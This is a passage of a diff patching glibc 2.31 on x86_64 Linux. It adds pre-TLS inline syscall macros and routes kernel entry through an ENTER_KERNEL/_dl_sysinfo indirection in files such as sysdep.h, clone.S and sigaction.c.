PRE_TLS_INLINE_SYSCALL(mmap, 6, addr, len, prot, flags, fd, offset); 93 | + //return (void *) MMAP_CALL (mmap, addr, len, prot, flags, fd, offset); 94 | #endif 95 | } 96 | weak_alias (__mmap64, mmap64) 97 | diff -urN 
glibc-2.31_base/sysdeps/unix/sysv/linux/open64_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/open64_nocancel.c 98 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/open64_nocancel.c 2020-02-01 12:52:50.000000000 +0100 99 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/open64_nocancel.c 2022-01-26 20:43:27.258712254 +0100 100 | @@ -42,8 +42,8 @@ 101 | va_end (arg); 102 | } 103 | 104 | - return INLINE_SYSCALL_CALL (openat, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, 105 | - mode); 106 | + return PRE_TLS_INLINE_SYSCALL (openat, 4, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, mode); 107 | +// return INLINE_SYSCALL_CALL (openat, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, mode); 108 | } 109 | 110 | hidden_def (__open64_nocancel) 111 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/pread64_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/pread64_nocancel.c 112 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/pread64_nocancel.c 2020-02-01 12:52:50.000000000 +0100 113 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/pread64_nocancel.c 2022-01-26 21:20:52.754299510 +0100 114 | @@ -27,6 +27,7 @@ 115 | ssize_t 116 | __pread64_nocancel (int fd, void *buf, size_t count, off64_t offset) 117 | { 118 | - return INLINE_SYSCALL_CALL (pread64, fd, buf, count, SYSCALL_LL64_PRW (offset)); 119 | + return PRE_TLS_INLINE_SYSCALL (pread64, 4, fd, buf, count, SYSCALL_LL64_PRW (offset)); 120 | + //return INLINE_SYSCALL_CALL (pread64, fd, buf, count, SYSCALL_LL64_PRW (offset)); 121 | } 122 | hidden_def (__pread64_nocancel) 123 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/read_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/read_nocancel.c 124 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/read_nocancel.c 2020-02-01 12:52:50.000000000 +0100 125 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/read_nocancel.c 2022-01-26 20:43:00.585760504 +0100 126 | @@ -23,6 +23,8 @@ 127 | ssize_t 128 | __read_nocancel (int fd, void *buf, size_t nbytes) 129 | { 130 | - return INLINE_SYSCALL_CALL (read, fd, buf, nbytes); 131 | +// return pre_tls_syscall3(SYS_ify(read), , fd, buf, nbytes); 132 | +// return INLINE_SYSCALL_CALL (read, fd, buf, nbytes); 133 | + return PRE_TLS_INLINE_SYSCALL (read, 3, fd, buf, nbytes); 134 | } 135 | hidden_def (__read_nocancel) 136 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c 137 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c 2020-02-01 12:52:50.000000000 +0100 138 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/fxstat.c 2022-01-26 21:24:28.143883242 +0100 139 | @@ -32,7 +32,8 @@ 140 | __fxstat (int vers, int fd, struct stat *buf) 141 | { 142 | if (vers == _STAT_VER_KERNEL || vers == _STAT_VER_LINUX) 143 | - return INLINE_SYSCALL (fstat, 2, fd, buf); 144 | + //return INLINE_SYSCALL (fstat, 2, fd, buf); 145 | + return PRE_TLS_INLINE_SYSCALL (fstat, 2, fd, buf); 146 | 147 | __set_errno (EINVAL); 148 | return -1; 149 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/xstat.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/xstat.c 150 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/wordsize-64/xstat.c 2020-02-01 12:52:50.000000000 +0100 151 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/wordsize-64/xstat.c 2022-01-26 21:15:04.803019004 +0100 152 | @@ -32,7 +32,8 @@ 153 | __xstat (int vers, const char *name, struct stat *buf) 154 | { 155 | if (vers == _STAT_VER_KERNEL || vers == _STAT_VER_LINUX) 156 | - return INLINE_SYSCALL (stat, 2, name, buf); 157 | 
+// return INLINE_SYSCALL (stat, 2, name, buf); 158 | + return PRE_TLS_INLINE_SYSCALL(stat, 2, name, buf); 159 | 160 | __set_errno (EINVAL); 161 | return -1; 162 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86/cpu-features.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86/cpu-features.c 163 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86/cpu-features.c 2020-02-01 12:52:50.000000000 +0100 164 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86/cpu-features.c 2022-01-26 20:38:57.690226355 +0100 165 | @@ -25,8 +25,10 @@ 166 | { 167 | unsigned long long cet_status[3]; 168 | INTERNAL_SYSCALL_DECL (err); 169 | - if (INTERNAL_SYSCALL (arch_prctl, err, 2, ARCH_CET_STATUS, 170 | - cet_status) == 0) 171 | +// if (INTERNAL_SYSCALL (arch_prctl, err, 2, ARCH_CET_STATUS, cet_status) == 0) 172 | +// if(pre_tls_syscall2(SYS_ify(arch_prctl), err, ARCH_CET_STATUS, cet_status) == 0) 173 | + if (PRE_TLS_INTERNAL_SYSCALL (arch_prctl, err, 2, ARCH_CET_STATUS, cet_status) == 0) 174 | + 175 | return cet_status[0]; 176 | return 0; 177 | } 178 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/brk.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/brk.c 179 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/brk.c 2020-02-01 12:52:50.000000000 +0100 180 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/brk.c 2022-01-26 20:38:05.970333056 +0100 181 | @@ -20,6 +20,7 @@ 182 | #include 183 | #include 184 | 185 | + 186 | /* This must be initialized data because commons can't have aliases. */ 187 | void *__curbrk = 0; 188 | 189 | @@ -28,7 +29,10 @@ 190 | { 191 | void *newbrk; 192 | 193 | - __curbrk = newbrk = (void *) INLINE_SYSCALL (brk, 1, addr); 194 | + //__curbrk = newbrk = (void *) INLINE_SYSCALL (brk, 1, addr); 195 | + //__curbrk = newbrk = (void *) pre_tls_syscall1(SYS_ify(brk), , addr); 196 | + __curbrk = newbrk = (void *) PRE_TLS_INLINE_SYSCALL (brk, 1, addr); 197 | + 198 | 199 | if (newbrk < addr) 200 | { 201 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/clone.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/clone.S 202 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/clone.S 2020-02-01 12:52:50.000000000 +0100 203 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/clone.S 2022-01-26 10:36:51.000000000 +0100 204 | @@ -56,13 +56,23 @@ 205 | jz SYSCALL_ERROR_LABEL 206 | 207 | /* Insert the argument onto the new stack. */ 208 | +#ifdef X86_64_USE_VSYSCALL 209 | + subq $24,%rsi 210 | + movq %rcx,16(%rsi) 211 | +#else 212 | subq $16,%rsi 213 | movq %rcx,8(%rsi) 214 | +#endif 215 | 216 | /* Save the function pointer. It will be popped off in the 217 | child in the ebx frobbing below. */ 218 | +#ifdef X86_64_USE_VSYSCALL 219 | + movq %rdi,8(%rsi) 220 | + leaq L(enter_kernel_end)(%rip),%r10 221 | + movq %r10,0(%rsi) 222 | +#else 223 | movq %rdi,0(%rsi) 224 | - 225 | +#endif 226 | /* Do the system call. */ 227 | movq %rdx, %rdi 228 | movq %r8, %rdx 229 | @@ -73,8 +83,9 @@ 230 | /* End FDE now, because in the child the unwind info will be 231 | wrong. */ 232 | cfi_endproc; 233 | - syscall 234 | - 235 | + ENTER_KERNEL 236 | + 237 | +L(enter_kernel_end): 238 | testq %rax,%rax 239 | jl SYSCALL_ERROR_LABEL 240 | jz L(thread_start) 241 | @@ -96,7 +107,7 @@ 242 | /* Call exit with return value from function call. 
*/ 243 | movq %rax, %rdi 244 | movl $SYS_ify(exit), %eax 245 | - syscall 246 | + ENTER_KERNEL 247 | cfi_endproc; 248 | 249 | cfi_startproc; 250 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h 251 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h 1970-01-01 01:00:00.000000000 +0100 252 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/dl-sysdep.h 2022-01-25 13:58:56.000000000 +0100 253 | @@ -0,0 +1,52 @@ 254 | +/* System-specific settings for dynamic linker code. IA-64 version. 255 | + Copyright (C) 2003-2020 Free Software Foundation, Inc. 256 | + This file is part of the GNU C Library. 257 | + 258 | + The GNU C Library is free software; you can redistribute it and/or 259 | + modify it under the terms of the GNU Lesser General Public 260 | + License as published by the Free Software Foundation; either 261 | + version 2.1 of the License, or (at your option) any later version. 262 | + 263 | + The GNU C Library is distributed in the hope that it will be useful, 264 | + but WITHOUT ANY WARRANTY; without even the implied warranty of 265 | + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 266 | + Lesser General Public License for more details. 267 | + 268 | + You should have received a copy of the GNU Lesser General Public 269 | + License along with the GNU C Library; if not, see 270 | + . */ 271 | + 272 | +#ifndef _LINUX_X86_64_DL_SYSDEP_H 273 | +#define _LINUX_X86_64_DL_SYSDEP_H 1 274 | + 275 | +#include_next 276 | + 277 | +/* Traditionally system calls have been made using break 0x100000. A 278 | + second method was introduced which, if possible, will use the EPC 279 | + instruction. To signal the presence and where to find the code the 280 | + kernel passes an AT_SYSINFO_EHDR pointer in the auxiliary vector to 281 | + the application. */ 282 | +#define NEED_DL_SYSINFO 1 283 | +#define USE_DL_SYSINFO 1 284 | + 285 | +#if defined NEED_DL_SYSINFO && !defined __ASSEMBLER__ 286 | +extern void _dl_sysinfo_syscall (void) attribute_hidden; 287 | +# define DL_SYSINFO_DEFAULT (uintptr_t) _dl_sysinfo_syscall 288 | +# define DL_SYSINFO_IMPLEMENTATION \ 289 | + asm (".text\n\t" \ 290 | + ".type _dl_sysinfo_syscall,@function\n\t" \ 291 | + ".hidden _dl_sysinfo_syscall\n" \ 292 | + CFI_STARTPROC "\n" \ 293 | + "_dl_sysinfo_syscall:\n\t" \ 294 | + "syscall;\n\t" \ 295 | + "ret;\n\t" \ 296 | + CFI_ENDPROC "\n" \ 297 | + ".size _dl_sysinfo_syscall,.-_dl_sysinfo_syscall\n\t" \ 298 | + ".previous"); 299 | +#endif 300 | + 301 | +/* _dl_argv cannot be attribute_relro, because _dl_start_user 302 | + might write into it after _dl_start returns. */ 303 | +#define DL_ARGV_NOT_RELRO 1 304 | + 305 | +#endif /* dl-sysdep.h */ 306 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/getcontext.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/getcontext.S 307 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/getcontext.S 2020-02-01 12:52:50.000000000 +0100 308 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/getcontext.S 2022-01-26 10:37:59.000000000 +0100 309 | @@ -73,7 +73,7 @@ 310 | mov %RSP_LP, %RSI_LP 311 | movl $ARCH_CET_STATUS, %edi 312 | movl $__NR_arch_prctl, %eax 313 | - syscall 314 | + ENTER_KERNEL 315 | testq %rax, %rax 316 | jz L(continue_no_err) 317 | 318 | @@ -125,7 +125,7 @@ 319 | #endif 320 | movl $_NSIG8,%r10d 321 | movl $__NR_rt_sigprocmask, %eax 322 | - syscall 323 | + ENTER_KERNEL 324 | cmpq $-4095, %rax /* Check %rax for error. 
*/ 325 | jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */ 326 | 327 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/setcontext.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/setcontext.S 328 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/setcontext.S 2020-02-01 12:52:50.000000000 +0100 329 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/setcontext.S 2022-01-26 10:38:30.000000000 +0100 330 | @@ -44,7 +44,7 @@ 331 | movl $SIG_SETMASK, %edi 332 | movl $_NSIG8,%r10d 333 | movl $__NR_rt_sigprocmask, %eax 334 | - syscall 335 | + ENTER_KERNEL 336 | /* Pop the pointer into RDX. The choice is arbitrary, but 337 | leaving RDI and RSI available for use later can avoid 338 | shuffling values. */ 339 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sigaction.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sigaction.c 340 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sigaction.c 2020-02-01 12:52:50.000000000 +0100 341 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sigaction.c 2022-01-26 10:42:05.000000000 +0100 342 | @@ -32,6 +32,17 @@ 343 | 344 | #include 345 | 346 | +#ifdef X86_64_USE_VSYSCALL 347 | +# ifdef SHARED 348 | +/* XXX : SYSINFO_OFFSET is hard-coded here! */ 349 | +# define ENTER_KERNEL_NO_RETURN "jmp *%fs:0x20" 350 | +# else 351 | +# define ENTER_KERNEL_NO_RETURN "jmp *_dl_sysinfo" 352 | +# endif 353 | +#else 354 | +# define ENTER_KERNEL_NO_RETURN "syscall" 355 | +#endif 356 | + 357 | /* NOTE: Please think twice before making any changes to the bits of 358 | code below. GDB needs some intimate knowledge about it to 359 | recognize them as signal trampolines, and make backtraces through 360 | @@ -78,7 +89,7 @@ 361 | " .type __" #name ",@function\n" \ 362 | "__" #name ":\n" \ 363 | " movq $" #syscall ", %rax\n" \ 364 | - " syscall\n" \ 365 | + ENTER_KERNEL_NO_RETURN "\n" \ 366 | ".LEND_" #name ":\n" \ 367 | ".section .eh_frame,\"a\",@progbits\n" \ 368 | ".LSTARTFRAME_" #name ":\n" \ 369 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/swapcontext.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/swapcontext.S 370 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/swapcontext.S 2020-02-01 12:52:50.000000000 +0100 371 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/swapcontext.S 2022-01-26 10:42:54.000000000 +0100 372 | @@ -77,7 +77,7 @@ 373 | movl $SIG_SETMASK, %edi 374 | movl $_NSIG8,%r10d 375 | movl $__NR_rt_sigprocmask, %eax 376 | - syscall 377 | + ENTER_KERNEL 378 | cmpq $-4095, %rax /* Check %rax for error. */ 379 | jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */ 380 | 381 | @@ -117,7 +117,7 @@ 382 | mov %RSP_LP, %RSI_LP 383 | movl $ARCH_CET_STATUS, %edi 384 | movl $__NR_arch_prctl, %eax 385 | - syscall 386 | + ENTER_KERNEL 387 | testq %rax, %rax 388 | jz L(continue_no_err) 389 | 390 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/syscall.S glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/syscall.S 391 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/syscall.S 2020-02-01 12:52:50.000000000 +0100 392 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/syscall.S 2022-01-26 10:43:20.000000000 +0100 393 | @@ -34,7 +34,7 @@ 394 | movq %r8, %r10 395 | movq %r9, %r8 396 | movq 8(%rsp),%r9 /* arg6 is on the stack. */ 397 | - syscall /* Do the system call. */ 398 | + ENTER_KERNEL /* Do the system call. */ 399 | cmpq $-4095, %rax /* Check %rax for error. */ 400 | jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */ 401 | ret /* Return to caller. 
*/ 402 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sysdep.h glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sysdep.h 403 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/x86_64/sysdep.h 2020-02-01 12:52:50.000000000 +0100 404 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/x86_64/sysdep.h 2022-01-28 16:03:14.328601531 +0100 405 | @@ -33,6 +33,13 @@ 406 | #undef SYS_ify 407 | #define SYS_ify(syscall_name) __NR_##syscall_name 408 | 409 | +#if defined USE_DL_SYSINFO \ 410 | + && (!defined NOT_IN_libc || defined IS_IN_libpthread) 411 | +# define X86_64_USE_VSYSCALL 1 412 | +#else 413 | +# undef X86_64_USE_VSYSCALL 414 | +#endif 415 | + 416 | /* This is to help the old kernel headers where __NR_semtimedop is not 417 | available. */ 418 | #ifndef __NR_semtimedop 419 | @@ -74,6 +81,21 @@ 420 | SYSCALL_ERROR_HANDLER \ 421 | END (name) 422 | 423 | +# undef PRE_TLS_PSEUDO 424 | +# define PRE_TLS_PSEUDO(name, syscall_name, args) \ 425 | + .text; \ 426 | + ENTRY (name) \ 427 | + PRE_TLS_DO_CALL (syscall_name, args); \ 428 | + cmpq $-4095, %rax; \ 429 | + jae SYSCALL_ERROR_LABEL 430 | + 431 | + 432 | +# undef PRE_TLS_DO_CALL 433 | +# define PRE_TLS_DO_CALL(syscall_name, args) \ 434 | + DOARGS_##args \ 435 | + movl $SYS_ify (syscall_name), %eax; \ 436 | + syscall; 437 | + 438 | # undef PSEUDO_NOERRNO 439 | # define PSEUDO_NOERRNO(name, syscall_name, args) \ 440 | .text; \ 441 | @@ -126,6 +148,18 @@ 442 | ret; 443 | # endif /* PIC */ 444 | 445 | +/* The original calling convention for system calls on Linux/x86-64 is 446 | + to use syscall. */ 447 | +#ifdef X86_64_USE_VSYSCALL 448 | +# ifdef SHARED 449 | +# define ENTER_KERNEL call *%fs:SYSINFO_OFFSET 450 | +# else 451 | +# define ENTER_KERNEL call *_dl_sysinfo 452 | +# endif 453 | +#else 454 | +# define ENTER_KERNEL syscall 455 | +#endif 456 | + 457 | /* The Linux/x86-64 kernel expects the system call parameters in 458 | registers according to the following table: 459 | 460 | @@ -162,11 +196,13 @@ 461 | 462 | Syscalls of more than 6 arguments are not supported. */ 463 | 464 | +// fcg: this should be ENTER_KERNEL 465 | + 466 | # undef DO_CALL 467 | # define DO_CALL(syscall_name, args) \ 468 | DOARGS_##args \ 469 | movl $SYS_ify (syscall_name), %eax; \ 470 | - syscall; 471 | + ENTER_KERNEL; 472 | 473 | # define DOARGS_0 /* nothing */ 474 | # define DOARGS_1 /* nothing */ 475 | @@ -177,6 +213,18 @@ 476 | # define DOARGS_6 DOARGS_5 477 | 478 | #else /* !__ASSEMBLER__ */ 479 | + 480 | +#ifdef X86_64_USE_VSYSCALL 481 | +# ifdef SHARED 482 | +/* XXX : SYSINFO_OFFSET is hard-coded here! */ 483 | +# define STR_ENTER_KERNEL "call *%%fs:0x20" 484 | +# else 485 | +# define STR_ENTER_KERNEL "call *_dl_sysinfo" 486 | +# endif 487 | +#else 488 | +# define STR_ENTER_KERNEL "syscall" 489 | +#endif 490 | + 491 | /* Define a macro which expands inline into the wrapper code for a system 492 | call. */ 493 | # undef INLINE_SYSCALL 494 | @@ -225,6 +273,394 @@ 495 | #define INTERNAL_SYSCALL_NCS(number, err, nr, args...) \ 496 | internal_syscall##nr (number, err, args) 497 | 498 | +// fcg: macros for syscalls before TLS is set up 499 | +# undef PRE_TLS_INLINE_SYSCALL 500 | +# define PRE_TLS_INLINE_SYSCALL(name, nr, args...) 
\ 501 | + ({ \ 502 | + unsigned long int resultvar = PRE_TLS_INTERNAL_SYSCALL (name, , nr, args); \ 503 | + if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (resultvar, ))) \ 504 | + { \ 505 | + __set_errno (INTERNAL_SYSCALL_ERRNO (resultvar, )); \ 506 | + resultvar = (unsigned long int) -1; \ 507 | + } \ 508 | + (long int) resultvar; }) 509 | + 510 | +#undef PRE_TLS_INTERNAL_SYSCALL 511 | +#define PRE_TLS_INTERNAL_SYSCALL(name, err, nr, args...) \ 512 | + pre_tls_syscall##nr (SYS_ify (name), err, args) 513 | + 514 | +#undef pre_tls_syscall1 515 | +#define pre_tls_syscall1(number, err, arg1) \ 516 | +({ \ 517 | + unsigned long int resultvar; \ 518 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 519 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 520 | + asm volatile ( \ 521 | + "syscall\n\t" \ 522 | + : "=a" (resultvar) \ 523 | + : "0" (number), "r" (_a1) \ 524 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 525 | + (long int) resultvar; \ 526 | +}) 527 | +#undef pre_tls_syscall2 528 | +#define pre_tls_syscall2(number, err, arg1, arg2) \ 529 | +({ \ 530 | + unsigned long int resultvar; \ 531 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 532 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 533 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 534 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 535 | + asm volatile ( \ 536 | + "syscall\n\t" \ 537 | + : "=a" (resultvar) \ 538 | + : "0" (number), "r" (_a1), "r" (_a2) \ 539 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 540 | + (long int) resultvar; \ 541 | +}) 542 | +#undef pre_tls_syscall4 543 | +#define pre_tls_syscall4(number, err, arg1, arg2, arg3, arg4) \ 544 | +({ \ 545 | + unsigned long int resultvar; \ 546 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 547 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 548 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 549 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 550 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 551 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 552 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 553 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 554 | + asm volatile ( \ 555 | + "syscall\n\t" \ 556 | + : "=a" (resultvar) \ 557 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4) \ 558 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 559 | + (long int) resultvar; \ 560 | +}) 561 | +#undef pre_tls_syscall3 562 | +#define pre_tls_syscall3(number, err, arg1, arg2, arg3) \ 563 | +({ \ 564 | + unsigned long int resultvar; \ 565 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 566 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 567 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 568 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 569 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 570 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 571 | + asm volatile ( \ 572 | + "syscall\n\t" \ 573 | + : "=a" (resultvar) \ 574 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3) \ 575 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 576 | + (long int) resultvar; \ 577 | +}) 578 | +#undef pre_tls_syscall5 579 | +#define pre_tls_syscall5(number, err, arg1, arg2, arg3, arg4, arg5) \ 580 | +({ \ 581 | + unsigned long int resultvar; \ 582 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 583 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 584 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 585 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 586 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 587 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 
588 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 589 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 590 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 591 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 592 | + asm volatile ( \ 593 | + "syscall\n\t" \ 594 | + : "=a" (resultvar) \ 595 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 596 | + "r" (_a5) \ 597 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 598 | + (long int) resultvar; \ 599 | +}) 600 | + 601 | +#undef pre_tls_syscall6 602 | +#define pre_tls_syscall6(number, err, arg1, arg2, arg3, arg4, arg5, arg6) \ 603 | +({ \ 604 | + unsigned long int resultvar; \ 605 | + TYPEFY (arg6, __arg6) = ARGIFY (arg6); \ 606 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 607 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 608 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 609 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 610 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 611 | + register TYPEFY (arg6, _a6) asm ("r9") = __arg6; \ 612 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 613 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 614 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 615 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 616 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 617 | + asm volatile ( \ 618 | + "syscall\n\t" \ 619 | + : "=a" (resultvar) \ 620 | + : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 621 | + "r" (_a5), "r" (_a6) \ 622 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 623 | + (long int) resultvar; \ 624 | +}) 625 | + 626 | +// fcg: // for now, disable non-shared call to _dl_sysinfo 627 | +# if defined X86_64_USE_VSYSCALL && defined SHARED 628 | +//# ifdef SHARED 629 | +#undef internal_syscall0 630 | +#define internal_syscall0(number, err, dummy...) 
\ 631 | +({ \ 632 | + unsigned long int resultvar; \ 633 | + asm volatile ( \ 634 | + "call *%%fs:%P2\n\t" \ 635 | + : "=a" (resultvar) \ 636 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)) \ 637 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 638 | + (long int) resultvar; \ 639 | +}) 640 | + 641 | +#undef internal_syscall1 642 | +#define internal_syscall1(number, err, arg1) \ 643 | +({ \ 644 | + unsigned long int resultvar; \ 645 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 646 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 647 | + asm volatile ( \ 648 | + "call *%%fs:%P2\n\t" \ 649 | + : "=a" (resultvar) \ 650 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1) \ 651 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 652 | + (long int) resultvar; \ 653 | +}) 654 | + 655 | +#undef internal_syscall2 656 | +#define internal_syscall2(number, err, arg1, arg2) \ 657 | +({ \ 658 | + unsigned long int resultvar; \ 659 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 660 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 661 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 662 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 663 | + asm volatile ( \ 664 | + "call *%%fs:%P2\n\t" \ 665 | + : "=a" (resultvar) \ 666 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2) \ 667 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 668 | + (long int) resultvar; \ 669 | +}) 670 | + 671 | +#undef internal_syscall3 672 | +#define internal_syscall3(number, err, arg1, arg2, arg3) \ 673 | +({ \ 674 | + unsigned long int resultvar; \ 675 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 676 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 677 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 678 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 679 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 680 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 681 | + asm volatile ( \ 682 | + "call *%%fs:%P2\n\t" \ 683 | + : "=a" (resultvar) \ 684 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3) \ 685 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 686 | + (long int) resultvar; \ 687 | +}) 688 | + 689 | +#undef internal_syscall4 690 | +#define internal_syscall4(number, err, arg1, arg2, arg3, arg4) \ 691 | +({ \ 692 | + unsigned long int resultvar; \ 